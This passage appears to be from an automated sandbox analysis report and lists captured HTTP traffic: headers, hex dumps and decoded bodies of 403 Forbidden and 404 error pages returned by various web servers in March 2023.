3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:27 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:27 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:27 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 40031eb7-50a3-42c1-bd98-0c57c8d07632CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p5AFMd2Q6f%2FPaPlCD8Kolr7l54GqDeWGb0dKKbuECobxDJP7s0t%2Fs6EpmhMusZTWvEKiZC0JD7W%2BXb%2B0MlVg8Ls5VYhLrhyMU7JUe1ro3j5gOa1zXMLWtqAc%2BhXl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=169.999838Server: cloudflareCF-RAY: 7a59a870b970bbe6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:28 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:29 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:29 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:29 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: EkQtknN7/WtA02ycFData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 